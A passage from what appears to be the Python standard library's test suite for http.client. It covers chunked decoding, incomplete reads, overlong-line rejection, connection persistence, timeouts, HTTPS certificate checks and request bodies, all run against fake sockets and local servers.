(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile():
mode = 'r'
d = data()
def read(self, blocksize=-1):
return self.d.__next__()
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_send_type_error(self):
# See: Issue #12676
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
with self.assertRaises(TypeError):
conn.request('POST', 'test', conn)
def test_chunked(self):
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(n) + resp.read(n) + resp.read(), expected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_readinto_chunked(self):
expected = chunked_expected
nexpected = len(expected)
b = bytearray(128)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
n = resp.readinto(b)
self.assertEqual(b[:nexpected], expected)
self.assertEqual(n, nexpected)
resp.close()
# Various read sizes
for n in range(1, 12):
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
m = memoryview(b)
i = resp.readinto(m[0:n])
i += resp.readinto(m[i:n + i])
i += resp.readinto(m[i:])
self.assertEqual(b[:nexpected], expected)
self.assertEqual(i, nexpected)
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
n = resp.readinto(b)
except client.IncompleteRead as i:
self.assertEqual(i.partial, expected)
expected_message = 'IncompleteRead(%d bytes read)' % len(expected)
self.assertEqual(repr(i), expected_message)
self.assertEqual(str(i), expected_message)
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_readinto_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + last_chunk + chunked_end)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertEqual(bytes(b), b'\x00'*5)
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_negative_content_length(self):
sock = FakeSocket(
'HTTP/1.1 200 OK\r\nContent-Length: -1\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), b'Hello\r\n')
self.assertTrue(resp.isclosed())
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except client.IncompleteRead as i:
self.assertEqual(i.partial, b'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertTrue(resp.isclosed())
else:
self.fail('IncompleteRead expected')
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = client.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(OSError,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises((client.LineTooLong, client.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
self.assertRaises(client.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
'\r\n'
)
resp = client.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(client.LineTooLong, resp.read)
def test_early_eof(self):
# Test httpresponse with no \r\n termination,
body = "HTTP/1.1 200 Ok"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_error_leak(self):
# Test that the socket is not leaked if getresponse() fails
conn = client.HTTPConnection('example.com')
response = None
class Response(client.HTTPResponse):
def __init__(self, *pos, **kw):
nonlocal response
response = self # Avoid garbage collector closing the socket
client.HTTPResponse.__init__(self, *pos, **kw)
conn.response_class = Response
conn.sock = FakeSocket('Invalid status line')
conn.request('GET', '/')
self.assertRaises(client.BadStatusLine, conn.getresponse)
self.assertTrue(response.closed)
self.assertTrue(conn.sock.file_closed)
def test_chunked_extension(self):
extra = '3;foo=bar\r\n' + 'abc\r\n'
expected = chunked_expected + b'abc'
sock = FakeSocket(chunked_start + extra + last_chunk_extended + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_missing_end(self):
"""some servers may serve up a short chunked encoding stream"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk) #no terminating crlf
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
resp.close()
def test_chunked_trailers(self):
"""See that trailers are read and ignored"""
expected = chunked_expected
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# we should have reached the end of the file
self.assertEqual(sock.file.read(), b"") #we read to the end
resp.close()
def test_chunked_sync(self):
"""Check that we don't read past the end of the chunked-encoding stream"""
expected = chunked_expected
extradata = "extradata"
sock = FakeSocket(chunked_start + last_chunk + trailers + chunked_end + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata.encode("ascii")) #we read to the end
resp.close()
def test_content_length_sync(self):
"""Check that we don't read past the end of the Content-Length stream"""
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readlines_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readlines(2000), [expected])
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(2000), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_readline_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\n' + expected + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.readline(10), expected)
self.assertEqual(resp.readline(10), b"")
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_read1_bound_content_length(self):
extradata = b"extradata"
expected = b"Hello123\r\n"
sock = FakeSocket(b'HTTP/1.1 200 OK\r\nContent-Length: 30\r\n\r\n' + expected*3 + extradata)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read1(20), expected*2)
self.assertEqual(resp.read(), expected)
# the file should now have our extradata ready to be read
self.assertEqual(sock.file.read(), extradata) #we read to the end
resp.close()
def test_response_fileno(self):
# Make sure fd returned by fileno is valid.
threading = support.import_module("threading")
serv = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
self.addCleanup(serv.close)
serv.bind((HOST, 0))
serv.listen()
result = None
def run_server():
[conn, address] = serv.accept()
with conn, conn.makefile("rb") as reader:
# Read the request header until a blank line
while True:
line = reader.readline()
if not line.rstrip(b"\r\n"):
break
conn.sendall(b"HTTP/1.1 200 Connection established\r\n\r\n")
nonlocal result
result = reader.read()
thread = threading.Thread(target=run_server)
thread.start()
conn = client.HTTPConnection(*serv.getsockname())
conn.request("CONNECT", "dummy:1234")
response = conn.getresponse()
try:
self.assertEqual(response.status, client.OK)
s = socket.socket(fileno=response.fileno())
try:
s.sendall(b"proxied data\n")
finally:
s.detach()
finally:
response.close()
conn.close()
thread.join()
self.assertEqual(result, b"proxied data\n")
class ExtendedReadTest(TestCase):
"""
Test peek(), read1(), readline()
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'\r\n'
'hello world!\n'
'and now \n'
'for something completely different\n'
'foo'
)
lines_expected = lines[lines.find('hello'):].encode("ascii")
lines_chunked = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
def setUp(self):
sock = FakeSocket(self.lines)
resp = client.HTTPResponse(sock, method="GET")
resp.begin()
resp.fp = io.BufferedReader(resp.fp)
self.resp = resp
def test_peek(self):
resp = self.resp
# patch up the buffered peek so that it returns not too much stuff
oldpeek = resp.fp.peek
def mypeek(n=-1):
p = oldpeek(n)
if n >= 0:
return p[:n]
return p[:10]
resp.fp.peek = mypeek
all = []
while True:
# try a short peek
p = resp.peek(3)
if p:
self.assertGreater(len(p), 0)
# then unbounded peek
p2 = resp.peek()
self.assertGreaterEqual(len(p2), len(p))
self.assertTrue(p2.startswith(p))
next = resp.read(len(p2))
self.assertEqual(next, p2)
else:
next = resp.read()
self.assertFalse(next)
all.append(next)
if not next:
break
self.assertEqual(b"".join(all), self.lines_expected)
def test_readline(self):
resp = self.resp
self._verify_readline(self.resp.readline, self.lines_expected)
def _verify_readline(self, readline, expected):
all = []
while True:
# short readlines
line = readline(5)
if line and line != b"foo":
if len(line) < 5:
self.assertTrue(line.endswith(b"\n"))
all.append(line)
if not line:
break
self.assertEqual(b"".join(all), expected)
def test_read1(self):
resp = self.resp
def r():
res = resp.read1(4)
self.assertLessEqual(len(res), 4)
return res
readliner = Readliner(r)
self._verify_readline(readliner.readline, self.lines_expected)
def test_read1_unbounded(self):
resp = self.resp
all = []
while True:
data = resp.read1()
if not data:
break
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_bounded(self):
resp = self.resp
all = []
while True:
data = resp.read1(10)
if not data:
break
self.assertLessEqual(len(data), 10)
all.append(data)
self.assertEqual(b"".join(all), self.lines_expected)
def test_read1_0(self):
self.assertEqual(self.resp.read1(0), b"")
def test_peek_0(self):
p = self.resp.peek(0)
self.assertLessEqual(0, len(p))
class ExtendedReadTestChunked(ExtendedReadTest):
"""
Test peek(), read1(), readline() in chunked mode
"""
lines = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd!\n\r\n'
'9\r\n'
'and now \n\r\n'
'23\r\n'
'for something completely different\n\r\n'
'3\r\n'
'foo\r\n'
'0\r\n' # terminating chunk
'\r\n' # end of trailers
)
class Readliner:
"""
a simple readline class that uses an arbitrary read function and buffering
"""
def __init__(self, readfunc):
self.readfunc = readfunc
self.remainder = b""
def readline(self, limit):
data = []
datalen = 0
read = self.remainder
try:
while True:
idx = read.find(b'\n')
if idx != -1:
break
if datalen + len(read) >= limit:
idx = limit - datalen - 1
# read more data
data.append(read)
read = self.readfunc()
if not read:
idx = 0 #eof condition
break
idx += 1
data.append(read[:idx])
self.remainder = read[idx:]
return b"".join(data)
except:
self.remainder = b"".join(data)
raise
class OfflineTest(TestCase):
def test_all(self):
# Documented objects defined in the module should be in __all__
expected = {"responses"} # White-list documented dict() object
# HTTPMessage, parse_headers(), and the HTTP status code constants are
# intentionally omitted for simplicity
blacklist = {"HTTPMessage", "parse_headers"}
for name in dir(client):
if name.startswith("_") or name in blacklist:
continue
module_object = getattr(client, name)
if getattr(module_object, "__module__", None) == "http.client":
expected.add(name)
self.assertCountEqual(client.__all__, expected)
def test_responses(self):
self.assertEqual(client.responses[client.NOT_FOUND], "Not Found")
def test_client_constants(self):
# Make sure we don't break backward compatibility with 3.4
expected = [
'CONTINUE',
'SWITCHING_PROTOCOLS',
'PROCESSING',
'OK',
'CREATED',
'ACCEPTED',
'NON_AUTHORITATIVE_INFORMATION',
'NO_CONTENT',
'RESET_CONTENT',
'PARTIAL_CONTENT',
'MULTI_STATUS',
'IM_USED',
'MULTIPLE_CHOICES',
'MOVED_PERMANENTLY',
'FOUND',
'SEE_OTHER',
'NOT_MODIFIED',
'USE_PROXY',
'TEMPORARY_REDIRECT',
'BAD_REQUEST',
'UNAUTHORIZED',
'PAYMENT_REQUIRED',
'FORBIDDEN',
'NOT_FOUND',
'METHOD_NOT_ALLOWED',
'NOT_ACCEPTABLE',
'PROXY_AUTHENTICATION_REQUIRED',
'REQUEST_TIMEOUT',
'CONFLICT',
'GONE',
'LENGTH_REQUIRED',
'PRECONDITION_FAILED',
'REQUEST_ENTITY_TOO_LARGE',
'REQUEST_URI_TOO_LONG',
'UNSUPPORTED_MEDIA_TYPE',
'REQUESTED_RANGE_NOT_SATISFIABLE',
'EXPECTATION_FAILED',
'UNPROCESSABLE_ENTITY',
'LOCKED',
'FAILED_DEPENDENCY',
'UPGRADE_REQUIRED',
'PRECONDITION_REQUIRED',
'TOO_MANY_REQUESTS',
'REQUEST_HEADER_FIELDS_TOO_LARGE',
'INTERNAL_SERVER_ERROR',
'NOT_IMPLEMENTED',
'BAD_GATEWAY',
'SERVICE_UNAVAILABLE',
'GATEWAY_TIMEOUT',
'HTTP_VERSION_NOT_SUPPORTED',
'INSUFFICIENT_STORAGE',
'NOT_EXTENDED',
'NETWORK_AUTHENTICATION_REQUIRED',
]
for const in expected:
with self.subTest(constant=const):
self.assertTrue(hasattr(client, const))
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.source_port = support.find_unused_port()
self.serv.listen()
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = client.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = client.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other than the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
# This will prove that the timeout gets through HTTPConnection
# and into the socket.
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = client.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class PersistenceTest(TestCase):
def test_reuse_reconnect(self):
# Should reuse or reconnect depending on header from server
tests = (
('1.0', '', False),
('1.0', 'Connection: keep-alive\r\n', True),
('1.1', '', True),
('1.1', 'Connection: close\r\n', False),
('1.0', 'Connection: keep-ALIVE\r\n', True),
('1.1', 'Connection: cloSE\r\n', False),
)
for version, header, reuse in tests:
with self.subTest(version=version, header=header):
msg = (
'HTTP/{} 200 OK\r\n'
'{}'
'Content-Length: 12\r\n'
'\r\n'
'Dummy body\r\n'
).format(version, header)
conn = FakeSocketHTTPConnection(msg)
self.assertIsNone(conn.sock)
conn.request('GET', '/open-connection')
with conn.getresponse() as response:
self.assertEqual(conn.sock is None, not reuse)
response.read()
self.assertEqual(conn.sock is None, not reuse)
self.assertEqual(conn.connections, 1)
conn.request('GET', '/subsequent-request')
self.assertEqual(conn.connections, 1 if reuse else 2)
def test_disconnected(self):
def make_reset_reader(text):
"""Return BufferedReader that raises ECONNRESET at EOF"""
stream = io.BytesIO(text)
def readinto(buffer):
size = io.BytesIO.readinto(stream, buffer)
if size == 0:
raise ConnectionResetError()
return size
stream.readinto = readinto
return io.BufferedReader(stream)
tests = (
(io.BytesIO, client.RemoteDisconnected),
(make_reset_reader, ConnectionResetError),
)
for stream_factory, exception in tests:
with self.subTest(exception=exception):
conn = FakeSocketHTTPConnection(b'', stream_factory)
conn.request('GET', '/eof-response')
self.assertRaises(exception, conn.getresponse)
self.assertIsNone(conn.sock)
# HTTPConnection.connect() should be automatically invoked
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
def test_100_close(self):
conn = FakeSocketHTTPConnection(
b'HTTP/1.1 100 Continue\r\n'
b'\r\n'
# Missing final response
)
conn.request('GET', '/', headers={'Expect': '100-continue'})
self.assertRaises(client.RemoteDisconnected, conn.getresponse)
self.assertIsNone(conn.sock)
conn.request('GET', '/reconnect')
self.assertEqual(conn.connections, 2)
class HTTPSTest(TestCase):
def setUp(self):
if not hasattr(client, 'HTTPSConnection'):
self.skipTest('ssl support required')
def make_server(self, certfile):
from test.ssl_servers import make_https_server
return make_https_server(self, certfile=certfile)
def test_attributes(self):
# simple test to check it's storing the timeout
h = client.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
def test_networked(self):
# Default settings: requires a valid cert from a trusted CA
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
h = client.HTTPSConnection('self-signed.pythontest.net', 443)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_networked_noverification(self):
# Switch off cert verification
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl._create_unverified_context()
h = client.HTTPSConnection('self-signed.pythontest.net', 443,
context=context)
h.request('GET', '/')
resp = h.getresponse()
h.close()
self.assertIn('nginx', resp.getheader('server'))
resp.close()
@support.system_must_validate_cert
def test_networked_trusted_by_default_cert(self):
# Default settings: requires a valid cert from a trusted CA
support.requires('network')
with support.transient_internet('www.python.org'):
h = client.HTTPSConnection('www.python.org', 443)
h.request('GET', '/')
resp = h.getresponse()
content_type = resp.getheader('content-type')
resp.close()
h.close()
self.assertIn('text/html', content_type)
def test_networked_good_cert(self):
# We feed the server's cert as a validating cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_selfsigned_pythontestdotnet)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
h.request('GET', '/')
resp = h.getresponse()
server_string = resp.getheader('server')
resp.close()
h.close()
self.assertIn('nginx', server_string)
def test_networked_bad_cert(self):
# We feed a "CA" cert that is unrelated to the server's cert
import ssl
support.requires('network')
with support.transient_internet('self-signed.pythontest.net'):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('self-signed.pythontest.net', 443, context=context)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_unknown_cert(self):
# The custom cert isn't known to the default trust bundle
import ssl
server = self.make_server(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port)
with self.assertRaises(ssl.SSLError) as exc_info:
h.request('GET', '/')
self.assertEqual(exc_info.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
def test_local_good_hostname(self):
# The (valid) cert validates the HTTP hostname
import ssl
server = self.make_server(CERT_localhost)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERT_localhost)
h = client.HTTPSConnection('localhost', server.port, context=context)
self.addCleanup(h.close)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.addCleanup(resp.close)
self.assertEqual(resp.status, 404)
def test_local_bad_hostname(self):
# The (valid) cert doesn't validate the HTTP hostname
import ssl
server = self.make_server(CERT_fakehostname)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(CERT_fakehostname)
h = client.HTTPSConnection('localhost', server.port, context=context)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# Same with explicit check_hostname=True
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
# With check_hostname=False, the mismatching is ignored
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=False)
h.request('GET', '/nonexistent')
resp = h.getresponse()
resp.close()
h.close()
self.assertEqual(resp.status, 404)
# The context's check_hostname setting is used if one isn't passed to
# HTTPSConnection.
context.check_hostname = False
h = client.HTTPSConnection('localhost', server.port, context=context)
h.request('GET', '/nonexistent')
resp = h.getresponse()
self.assertEqual(resp.status, 404)
resp.close()
h.close()
# Passing check_hostname to HTTPSConnection should override the
# context's setting.
h = client.HTTPSConnection('localhost', server.port, context=context,
check_hostname=True)
with self.assertRaises(ssl.CertificateError):
h.request('GET', '/')
@unittest.skipIf(not hasattr(client, 'HTTPSConnection'),
'http.client.HTTPSConnection not available')
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPSConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:443", "www.python.org", 443),
("www.python.org:", "www.python.org", 443),
("www.python.org", "www.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b",
443)):
c = client.HTTPSConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
class RequestBodyTest(TestCase):
"""Test cases where a request includes a message body."""
def setUp(self):
self.conn = client.HTTPConnection('example.com')
self.conn.sock = self.sock = FakeSocket("")
self.conn.sock = self.sock
def get_headers_and_fp(self):
f = io.BytesIO(self.sock.data)
f.readline() # read the request line
message = client.parse_headers(f)
return message, f
def test_manual_content_length(self):
# Set an incorrect content-length so that we can verify that
# it will not be over-ridden by the library.
self.conn.request("PUT", "/url", "body",
{"Content-Length": "42"})
message, f = self.get_headers_and_fp()
self.assertEqual("42", message.get("content-length"))
self.assertEqual(4, len(f.read()))
def test_ascii_body(self):
self.conn.request("PUT", "/url", "body")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_latin1_body(self):
self.conn.request("PUT", "/url", "body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_bytes_body(self):
self.conn.request("PUT", "/url", b"body\xc1")
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
def test_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as f:
f.write("body")
with open(support.TESTFN) as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("4", message.get("content-length"))
self.assertEqual(b'body', f.read())
def test_binary_file_body(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "wb") as f:
f.write(b"body\xc1")
with open(support.TESTFN, "rb") as f:
self.conn.request("PUT", "/url", f)
message, f = self.get_headers_and_fp()
self.assertEqual("text/plain", message.get_content_type())
self.assertIsNone(message.get_charset())
self.assertEqual("5", message.get("content-length"))
self.assertEqual(b'body\xc1', f.read())
class HTTPResponseTest(TestCase):
def setUp(self):
body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
sock = FakeSocket(body)
self.resp = client.HTTPResponse(sock)
self.resp.begin()
def test_getting_header(self):
header = self.resp.getheader('My-Header')
self.assertEqual(header, 'first-value, second-value')
header = self.resp.getheader('My-Header', 'some default')
self.assertEqual(header, 'first-value, second-value')
def test_getting_nonexistent_header_with_string_default(self):
header = self.resp.getheader('No-Such-Header', 'default-value')
self.assertEqual(header, 'default-value')
def test_getting_nonexistent_header_with_iterable_default(self):
header = self.resp.getheader('No-Such-Header', ['default', 'values'])
self.assertEqual(header, 'default, values')
header = self.resp.getheader('No-Such-Header', ('default', 'values'))
self.assertEqual(header, 'default, values')
def test_getting_nonexistent_header_without_default(self):
header = self.resp.getheader('No-Such-Header')
self.assertEqual(header, None)
def test_getting_header_defaultint(self):
header = self.resp.getheader('No-Such-Header',default=42)
self.assertEqual(header, 42)
class TunnelTests(TestCase):
def setUp(self):
response_text = (
'HTTP/1.0 200 OK\r\n\r\n' # Reply to CONNECT
'HTTP/1.1 200 OK\r\n' # Reply to HEAD
'Content-Length: 42\r\n\r\n'
)
self.host = 'proxy.com'
self.conn = client.HTTPConnection(self.host)
self.conn._create_connection = self._create_connection(response_text)
def tearDown(self):
self.conn.close()
def _create_connection(self, response_text):
def create_connection(address, timeout=None, source_address=None):
return FakeSocket(response_text, host=address[0], port=address[1])
return create_connection
def test_set_tunnel_host_port_headers(self):
tunnel_host = 'destination.com'
tunnel_port = 8888
tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
